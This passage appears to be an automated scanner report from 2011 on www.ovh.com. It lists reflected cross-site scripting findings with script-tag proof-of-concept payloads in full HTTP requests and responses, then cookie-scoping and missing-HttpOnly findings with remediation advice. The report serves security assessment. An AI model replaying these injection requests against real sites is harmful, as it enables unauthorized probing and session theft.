<h2 class="black lh30" >www.ovh.com/frebc68<script>alert(1)</script>fbcdea708ef/produits/offres_dedies.xml</h2>
...[SNIP]...

1.16. http://www.ovh.com/fr/produits/offres_dedies.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/offres_dedies.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f407e<script>alert(1)</script>2ede4d6b5fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/produitsf407e<script>alert(1)</script>2ede4d6b5fc/offres_dedies.xml HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10286

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr/produitsf407e<script>alert(1)</script>2ede4d6b5fc/offres_dedies.xml</h2>
...[SNIP]...

1.17. http://www.ovh.com/fr/produits/offres_dedies.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/produits/offres_dedies.xml

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 72980<script>alert(1)</script>58a296c42a0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fr/produits/offres_dedies.xml72980<script>alert(1)</script>58a296c42a0 HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 404 Not Found
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: fr
Content-Length: 10286

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Erreur 404 - OVH </t
...[SNIP]...
<h2 class="black lh30" >www.ovh.com/fr/produits/offres_dedies.xml72980<script>alert(1)</script>58a296c42a0</h2>
...[SNIP]...

2. Cookie scoped to parent domain previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ovh.com
Path:	/cgi-bin/ajax/sessionAjax.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

OVHSESSIONID=0f21db0eec9674857ae6aa60c8945a3a; path=/; domain=.ovh.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /cgi-bin/ajax/sessionAjax.cgi?sessionId= HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Content-Type: text/xml
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Set-Cookie: OVHSESSIONID=0f21db0eec9674857ae6aa60c8945a3a; path=/; domain=.ovh.com
Cache-Control: max-age=60
Expires: Sat, 05 Mar 2011 16:11:36 GMT
Vary: Accept-Encoding
Content-Type: text/xml; charset=UTF-8
Content-Language: fr
Content-Length: 146

<ajaxResult><function>sessionsList</function><status>100</status><hostname>www.ovh.com</hostname><sessionQuantity>0</sessionQuantity></ajaxResult>

3. Cookie without HttpOnly flag set previous next
There are 139 instances of this issue:

/cgi-bin/ajax/sessionAjax.cgi
/
/favicon.ico
/fr/dedie/jeux/
/fr/favicon.ico
/fr/images/index/1clic.jpg
/fr/images/index/3.jpg
/fr/images/index/controls/bDot.gif
/fr/images/index/controls/gDot.gif
/fr/images/index/controls/gLarrow.gif
/fr/images/index/controls/gRarrow.gif
/fr/images/index/dedicated.jpg
/fr/images/index/dom-promo.jpg
/fr/images/index/dom_bg.jpg
/fr/images/index/doms.jpg
/fr/images/index/dotafnfcomsbki.jpg
/fr/images/index/dotco.jpg
/fr/images/index/dotdk.jpg
/fr/images/index/dotin.jpg
/fr/images/index/dotla.jpg
/fr/images/index/dotmgms.jpg
/fr/images/index/ent-vid.jpg
/fr/images/index/fax.jpg
/fr/images/index/hg2010.jpg
/fr/images/index/housing.jpg
/fr/images/index/hybrid.jpg
/fr/images/index/mails.jpg
/fr/images/index/minicloud.jpg
/fr/images/index/order.jpg
/fr/images/index/pcc.jpg
/fr/images/index/renew.jpg
/fr/images/index/rps.jpg
/fr/images/index/slidebg.jpg
/fr/images/index/sms.jpg
/fr/images/index/ssl.jpg
/fr/images/index/sub-ind-bg.jpg
/fr/images/index/telecom-solutions.jpg
/fr/images/index/zmedia.jpg
/fr/images/prices/red/s1.gif
/fr/images/prices/red/s2.gif
/fr/images/prices/red/s6.gif
/fr/images/prices/red/s9.gif
/fr/images/prices/red/sc9.gif
/fr/images/prices/red/scurrency.gif
/fr/images/prices/red/sdot.gif
/fr/index.xml
/fr/javascripts/nav.js
/fr/javascripts/sessionAjax.js
/fr/js/Core.js
/fr/js/Logger.js
/fr/js/ajax-lib-core.js
/fr/js/ajax/domainSuggest.js
/fr/js/calendar.compat.js
/fr/js/mediabox/mediabox.css
/fr/js/mediabox/mediabox.js
/fr/js/mootools-core.js
/fr/js/mootools-more.js
/fr/js/slider/_class.noobSlide.packed.js
/fr/produits/dedies.xml
/fr/produits/gameplan.xml
/fr/produits/offres_dedies.xml
/fr/themes/10/bars.css
/fr/themes/10/dedicated.jpg
/fr/themes/10/dedicated_top.jpg
/fr/themes/10/footer.css
/fr/themes/10/header.css
/fr/themes/10/index.css
/fr/themes/10/main/bg.jpg
/fr/themes/10/main/body-top.jpg
/fr/themes/10/main/head-bg.jpg
/fr/themes/10/main/home.gif
/fr/themes/10/main/hr.gif
/fr/themes/10/main/logo.jpg
/fr/themes/10/main/menu-bg.jpg
/fr/themes/10/main/section-bg.jpg
/fr/themes/10/main/subsection-bg.gif
/fr/themes/10/main/tools.jpg
/fr/themes/10/mainMenuBigTop.jpg
/fr/themes/10/mainMenuBottom.jpg
/fr/themes/10/mainMenuTop.jpg
/fr/themes/10/products.css
/fr/themes/10/server.jpg
/fr/themes/10/share.css
/fr/themes/10/table_bg.jpg
/fr/themes/default/images/blue/logos/sd_bsd.gif
/fr/themes/default/images/blue/logos/sd_linux.gif
/fr/themes/default/images/blue/logos/sd_sol.gif
/fr/themes/default/images/blue/logos/sd_win.gif
/fr/themes/default/images/blue/mainMenuList.gif
/fr/themes/default/images/dedicated/Umode/Hbar.png
/fr/themes/default/images/dedicated/Umode/VPS.png
/fr/themes/default/images/dedicated/Umode/experts.png
/fr/themes/default/images/dedicated/Umode/hosting.png
/fr/themes/default/images/dedicated/Umode/order_index.gif
/fr/themes/default/images/dedicated/Umode/rdesktop.png
/fr/themes/default/images/dedicated/Umode/right_bg.gif
/fr/themes/default/images/dedicated/Umode/yes_bk.gif
/fr/themes/default/images/flags/cz.png
/fr/themes/default/images/flags/de.png
/fr/themes/default/images/flags/es.png
/fr/themes/default/images/flags/fi.png
/fr/themes/default/images/flags/ie.png
/fr/themes/default/images/flags/it.png
/fr/themes/default/images/flags/lt.png
/fr/themes/default/images/flags/nl.png
/fr/themes/default/images/flags/pl.png
/fr/themes/default/images/flags/pt.png
/fr/themes/default/images/flags/uk.png
/fr/themes/default/images/header/header_sub_menu_sep.png
/fr/themes/default/images/share/tab_inverted_selected.png
/fr/themes/default/images/share/tab_unselected.png
/javascripts/nav.js
/javascripts/sessionAjax.js
/javascripts/share.js
/js/10/menu.js
/js/Core.js
/js/Logger.js
/js/ajax-lib-core.js
/js/ajax/domainSuggest.js
/js/base64.js
/js/calendar.compat.js
/js/mootools-core.js
/js/mootools-more.js
/js/spyweb.js
/themes/10/bars.css
/themes/10/footer.css
/themes/10/header.css
/themes/10/main/bg.jpg
/themes/10/main/body-top.jpg
/themes/10/main/head-bg.jpg
/themes/10/main/home.gif
/themes/10/main/hr.gif
/themes/10/main/logo.jpg
/themes/10/main/menu-bg.jpg
/themes/10/main/tools.jpg
/themes/10/products.css
/themes/10/share.css
/themes/default/images/ecran-erreur-bleu.png
/themes/default/images/header/header_sub_menu_sep.png

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

3.1. http://www.ovh.com/cgi-bin/ajax/sessionAjax.cgi previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.ovh.com
Path:	/cgi-bin/ajax/sessionAjax.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OVHSESSIONID=0f21db0eec9674857ae6aa60c8945a3a; path=/; domain=.ovh.com
slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

3.2. http://www.ovh.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R3935339247; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Set-Cookie: slb=R3935339247; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:25 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Location: http://www.ovh.com/fr/index.xml
Cache-Control: max-age=60
Expires: Sat, 05 Mar 2011 16:11:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 335

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.ovh.com/fr/index.xml">here</a>.</p>

...[SNIP]...

3.3. http://www.ovh.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:12:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 07 Dec 2006 12:08:58 GMT
ETag: "2ac22-47e-4240290664a80"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:12:43 GMT
Age: 1
Content-Type: image/x-icon

............ .h.......(....... ..... .............................................^^^.111.........111.^^^.................................<<<.................................<<<.......................
...[SNIP]...

3.4. http://www.ovh.com/fr/dedie/jeux/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/dedie/jeux/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/dedie/jeux/ HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Location: http://www.ovh.com/fr/produits/gameplan.xml
Cache-Control: max-age=60
Expires: Sat, 05 Mar 2011 16:11:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 371

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.ovh.com/fr/p
...[SNIP]...

3.5. http://www.ovh.com/fr/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/favicon.ico HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 01 Jul 2008 10:21:12 GMT
ETag: "2c112-6d3-450f3bc397600"
Accept-Ranges: bytes
Content-Length: 1747
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3524
Content-Type: image/x-icon

GIF89a6.:..........+++`aa.....................CCC............=>>....................................aaa.........^^^.....NOO'''111.................. ......

\]]mmmuww...nooz{{344............kll.
...[SNIP]...

3.6. http://www.ovh.com/fr/images/index/1clic.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/1clic.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/1clic.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121fa8-2822-488c36803f4fc"
Accept-Ranges: bytes
Content-Length: 10274
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:12:17 GMT
Age: 3501
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.7. http://www.ovh.com/fr/images/index/3.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/3.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/3.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f84-30c1-488c368017903"
Accept-Ranges: bytes
Content-Length: 12481
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:58:09 GMT
Age: 749
Content-Type: image/jpeg

......JFIF.....v.v.....C......................    ....
   ..


.......

.......................C.............
.............................................................................................
...[SNIP]...

3.8. http://www.ovh.com/fr/images/index/controls/bDot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/controls/bDot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/controls/bDot.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:04 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 19 Oct 2010 03:31:08 GMT
ETag: "22fc1c-146-492efec779960"
Accept-Ranges: bytes
Content-Length: 326
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:11:04 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a
.
.. . P..R..V..Y..Z..\.._..`..c..f..i.Ru.Uu.Qw.S}.N..N..Q.......................................................................................................................................
...[SNIP]...

3.9. http://www.ovh.com/fr/images/index/controls/gDot.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/controls/gDot.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/controls/gDot.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:02 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 19 Oct 2010 03:31:08 GMT
ETag: "22fc22-d6-492efec77dfdb"
Accept-Ranges: bytes
Content-Length: 214
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:11:02 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a
.
....................................................................................................!..Created with GIMP.!...
...,....
.
...>.'^Uu.(55.D...(H.b.L.C.Y...'0X,..@. X2..2..d>...Px
...[SNIP]...

3.10. http://www.ovh.com/fr/images/index/controls/gLarrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/controls/gLarrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/controls/gLarrow.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 19 Oct 2010 03:31:08 GMT
ETag: "22fc0e-144-492efec76eaf9"
Accept-Ranges: bytes
Content-Length: 324
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:11:01 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a
....7............................................................................................................................................................................................
...[SNIP]...

3.11. http://www.ovh.com/fr/images/index/controls/gRarrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/controls/gRarrow.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/controls/gRarrow.gif HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:11:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 19 Oct 2010 03:31:08 GMT
ETag: "22fc14-143-492efec773d23"
Accept-Ranges: bytes
Content-Length: 323
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:11:03 GMT
Content-Type: image/gif
Content-Language: fr

GIF89a
....6............................................................................................................................................................................................
...[SNIP]...

3.12. http://www.ovh.com/fr/images/index/dedicated.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/fr/images/index/dedicated.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fr/images/index/dedicated.jpg HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/fr/index.xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:40 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 11 Jun 2010 16:12:31 GMT
ETag: "121f62-3508-488c367ff38df"
Accept-Ranges: bytes
Content-Length: 13576
